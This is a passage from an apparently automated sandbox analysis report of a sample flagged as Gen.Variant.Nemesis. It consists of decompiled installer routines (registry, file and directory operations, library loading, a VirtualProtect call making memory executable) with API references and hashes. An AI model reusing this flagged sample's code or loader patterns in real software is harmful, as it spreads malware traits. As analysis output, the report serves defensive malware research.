                                                                          							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                          							E004061C9(__esi,  *__esi);
                                                                          						} else {
                                                                          							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                          								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                          								_t35[0x7fe] = _t27;
                                                                          							} else {
                                                                          								goto L7;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					_push(_t33); // executed
                                                                          					RegCloseKey(); // executed
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                          				return 0;
                                                                          			}









                                                                          APIs
                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402551
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: eed506b0cef53421108cb298528dda3e536a838de4d8cdecc9fe09217e6dde99
                                                                          • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                          • Opcode Fuzzy Hash: eed506b0cef53421108cb298528dda3e536a838de4d8cdecc9fe09217e6dde99
                                                                          • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 69%
                                                                          			E00401389(signed int _a4) {
                                                                          				intOrPtr* _t6;
                                                                          				void* _t8;
                                                                          				void* _t10;
                                                                          				signed int _t11;
                                                                          				void* _t12;
                                                                          				signed int _t16;
                                                                          				signed int _t17;
                                                                          				void* _t18;
                                                                          
                                                                          				_t17 = _a4;
                                                                          				while(_t17 >= 0) {
                                                                          					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                          					if( *_t6 == 1) {
                                                                          						break;
                                                                          					}
                                                                          					_push(_t6); // executed
                                                                          					_t8 = E00401434(); // executed
                                                                          					if(_t8 == 0x7fffffff) {
                                                                          						return 0x7fffffff;
                                                                          					}
                                                                          					_t10 = E0040136D(_t8);
                                                                          					if(_t10 != 0) {
                                                                          						_t11 = _t10 - 1;
                                                                          						_t16 = _t17;
                                                                          						_t17 = _t11;
                                                                          						_t12 = _t11 - _t16;
                                                                          					} else {
                                                                          						_t12 = _t10 + 1;
                                                                          						_t17 = _t17 + 1;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                          						 *0x433ecc =  *0x433ecc + _t12;
                                                                          						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433ecc, 0x7530,  *0x433eb4), 0); // executed
                                                                          					}
                                                                          				}
                                                                          				return 0;
                                                                          			}












                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                          • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                          • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                          • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402388(void* __ebx) {
                                                                          				long _t7;
                                                                          				void* _t10;
                                                                          				void* _t14;
                                                                          				long _t18;
                                                                          				intOrPtr _t20;
                                                                          				void* _t22;
                                                                          				void* _t23;
                                                                          
                                                                          				_t14 = __ebx;
                                                                          				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                          				_t20 =  *((intOrPtr*)(_t23 - 0x24));
                                                                          				if( *(_t23 - 0x18) != __ebx) {
                                                                          					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                                          					_t18 = _t7;
                                                                          					goto L4;
                                                                          				} else {
                                                                          					_t10 = E00402C77(_t26, 2); // executed
                                                                          					_t22 = _t10;
                                                                          					if(_t22 == __ebx) {
                                                                          						L6:
                                                                          						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                          					} else {
                                                                          						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
                                                                          						RegCloseKey(_t22);
                                                                          						L4:
                                                                          						if(_t18 != _t14) {
                                                                          							goto L6;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
                                                                          				return 0;
                                                                          			}











                                                                          APIs
                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteValue
                                                                          • String ID:
                                                                          • API String ID: 2831762973-0
                                                                          • Opcode ID: 86383d69255a0886f095d774a645512c19a2905d4149a767ae50d9de73aafd9d
                                                                          • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                          • Opcode Fuzzy Hash: 86383d69255a0886f095d774a645512c19a2905d4149a767ae50d9de73aafd9d
                                                                          • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShow
                                                                          • String ID:
                                                                          • API String ID: 1136574915-0
                                                                          • Opcode ID: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
                                                                          • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                          • Opcode Fuzzy Hash: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
                                                                          • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040665C(signed int _a4) {
                                                                          				struct HINSTANCE__* _t5;
                                                                          				signed int _t10;
                                                                          
                                                                          				_t10 = _a4 << 3;
                                                                          				_t8 =  *(_t10 + 0x40a3e0);
                                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                          				if(_t5 != 0) {
                                                                          					L2:
                                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                          				}
                                                                          				_t5 = E004065EC(_t8); // executed
                                                                          				if(_t5 == 0) {
                                                                          					return 0;
                                                                          				}
                                                                          				goto L2;
                                                                          			}






                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                            • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                            • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                            • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                          • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                                          • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                                          • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 68%
                                                                          			E00405D74(WCHAR* _a4, long _a8, long _a12) {
                                                                          				signed int _t5;
                                                                          				void* _t6;
                                                                          
                                                                          				_t5 = GetFileAttributesW(_a4); // executed
                                                                          				asm("sbb ecx, ecx");
                                                                          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                          				return _t6;
                                                                          			}






                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405D4F(WCHAR* _a4) {
                                                                          				signed char _t3;
                                                                          				signed char _t7;
                                                                          
                                                                          				_t3 = GetFileAttributesW(_a4); // executed
                                                                          				_t7 = _t3;
                                                                          				if(_t7 != 0xffffffff) {
                                                                          					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                          				}
                                                                          				return _t7;
                                                                          			}






                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405954,?,?,00000000,00405B2A,?,?,?,?), ref: 00405D54
                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D68
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                          • Instruction ID: 17c45ac7ebe851d6f29742f799baae9df596671d30cdc88244d2177400b79203
                                                                          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                          • Instruction Fuzzy Hash: C6D01276505420AFC2512738EF0C89FBF95DB54371B068B35FAE9A22F0CB304C578A98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405832(WCHAR* _a4) {
                                                                          				int _t2;
                                                                          
                                                                          				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                          				if(_t2 == 0) {
                                                                          					return GetLastError();
                                                                          				}
                                                                          				return 0;
                                                                          			}





                                                                          APIs
                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                          • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                          • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: EnumWindows
                                                                          • String ID:
                                                                          • API String ID: 1129996299-0
                                                                          • Opcode ID: dfbd171a05564454edc1b1081ded02cc2bfdfd173a462cff48ed113e1be42bb3
                                                                          • Instruction ID: 46de944ba099bec42195a3cc0c4fe91cca84dffd80c1a11bb3691d061ae26e22
                                                                          • Opcode Fuzzy Hash: dfbd171a05564454edc1b1081ded02cc2bfdfd173a462cff48ed113e1be42bb3
                                                                          • Instruction Fuzzy Hash: C54189351492888FEB1A8A2498493F97BE1EF63220B1C94DDCD955BA57C3290E07C745
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 70%
                                                                          			E0040167B() {
                                                                          				int _t7;
                                                                          				void* _t13;
                                                                          				void* _t15;
                                                                          				void* _t20;
                                                                          
                                                                          				_t18 = E00402C37(0xffffffd0);
                                                                          				_t16 = E00402C37(0xffffffdf);
                                                                          				E00402C37(0x13);
                                                                          				_t7 = MoveFileW(_t4, _t5); // executed
                                                                          				if(_t7 == 0) {
                                                                          					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004065C5(_t18) == 0) {
                                                                          						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                                          					} else {
                                                                          						E00406048(_t15, _t18, _t16);
                                                                          						_push(0xffffffe4);
                                                                          						goto L5;
                                                                          					}
                                                                          				} else {
                                                                          					_push(0xffffffe3);
                                                                          					L5:
                                                                          					E00401423();
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t20 - 4));
                                                                          				return 0;
                                                                          			}








                                                                          APIs
                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FileMove
                                                                          • String ID:
                                                                          • API String ID: 3562171763-0
                                                                          • Opcode ID: 74186f494bda1ab46af0e2e44738d7a84c9d2225f1465ff36fedc9be1cd50fa6
                                                                          • Instruction ID: a1293fda71315ca4f457bf12d72103a8cc789f689a624f6d3393c8ddcf995e9b
                                                                          • Opcode Fuzzy Hash: 74186f494bda1ab46af0e2e44738d7a84c9d2225f1465ff36fedc9be1cd50fa6
                                                                          • Instruction Fuzzy Hash: 06F0B431608114A7DB20B7B54F0DE9F61A48F92378F25073FB011B21D1EABC8911956F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 33%
                                                                          			E004027E9(intOrPtr __edx, void* __eflags) {
                                                                          				long _t8;
                                                                          				long _t10;
                                                                          				LONG* _t12;
                                                                          				void* _t14;
                                                                          				intOrPtr _t15;
                                                                          				void* _t17;
                                                                          				void* _t19;
                                                                          
                                                                          				_t15 = __edx;
                                                                          				_push(ds);
                                                                          				if(__eflags != 0) {
                                                                          					_t8 = E00402C15(2);
                                                                          					_pop(_t14);
                                                                          					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
                                                                          					_t10 = SetFilePointer(E004061E2(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
                                                                          					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
                                                                          						_push(_t10);
                                                                          						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                                          						E004061C9();
                                                                          					}
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
                                                                          				return 0;
                                                                          			}











                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                            • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointerwsprintf
                                                                          • String ID:
                                                                          • API String ID: 327478801-0
                                                                          • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                                          • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                                          • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                                          • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402306(int __eax, WCHAR* __ebx) {
                                                                          				WCHAR* _t11;
                                                                          				WCHAR* _t13;
                                                                          				void* _t17;
                                                                          				int _t21;
                                                                          
                                                                          				_t11 = __ebx;
                                                                          				_t5 = __eax;
                                                                          				_t13 = 0;
                                                                          				if(__eax != __ebx) {
                                                                          					__eax = E00402C37(__ebx);
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
                                                                          					_t13 = E00402C37(0x11);
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
                                                                          					_t11 = E00402C37(0x22);
                                                                          				}
                                                                          				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
                                                                          				_t21 = _t5;
                                                                          				if(_t21 == 0) {
                                                                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                                          				return 0;
                                                                          			}








                                                                          APIs
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID:
                                                                          • API String ID: 390214022-0
                                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0040611D(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                          				void* _t7;
                                                                          				long _t8;
                                                                          				void* _t9;
                                                                          
                                                                          				_t7 = E00406074(_a4,  &_a12);
                                                                          				if(_t7 != 0) {
                                                                          					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                          					return _t8;
                                                                          				}
                                                                          				_t9 = 6;
                                                                          				return _t9;
                                                                          			}







                                                                          APIs
                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                          • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                          • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405E26(void* _a4, void* _a8, long _a12) {
                                                                          				int _t7;
                                                                          				long _t11;
                                                                          
                                                                          				_t11 = _a12;
                                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                          					return 0;
                                                                          				} else {
                                                                          					return 1;
                                                                          				}
                                                                          			}






                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                          • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                          • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405DF7(void* _a4, void* _a8, long _a12) {
                                                                          				int _t7;
                                                                          				long _t11;
                                                                          
                                                                          				_t11 = _a12;
                                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                                          					return 0;
                                                                          				} else {
                                                                          					return 1;
                                                                          				}
                                                                          			}






                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                          • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                          • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                          
                                                                          				 *0x10004048 = _a4;
                                                                          				if(_a8 == 1) {
                                                                          					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                                          					 *0x1000405c = 0xc2;
                                                                          					 *0x1000404c = 0;
                                                                          					 *0x10004054 = 0;
                                                                          					 *0x10004068 = 0;
                                                                          					 *0x10004058 = 0;
                                                                          					 *0x10004050 = 0;
                                                                          					 *0x10004060 = 0;
                                                                          					 *0x1000405e = 0;
                                                                          				}
                                                                          				return 1;
                                                                          			}




                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004060EF(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                          				void* _t7;
                                                                          				long _t8;
                                                                          				void* _t9;
                                                                          
                                                                          				_t7 = E00406074(_a4,  &_a12);
                                                                          				if(_t7 != 0) {
                                                                          					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                          					return _t8;
                                                                          				}
                                                                          				_t9 = 6;
                                                                          				return _t9;
                                                                          			}







                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617D,?,00000000,?,?,Call,?), ref: 00406113
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Open
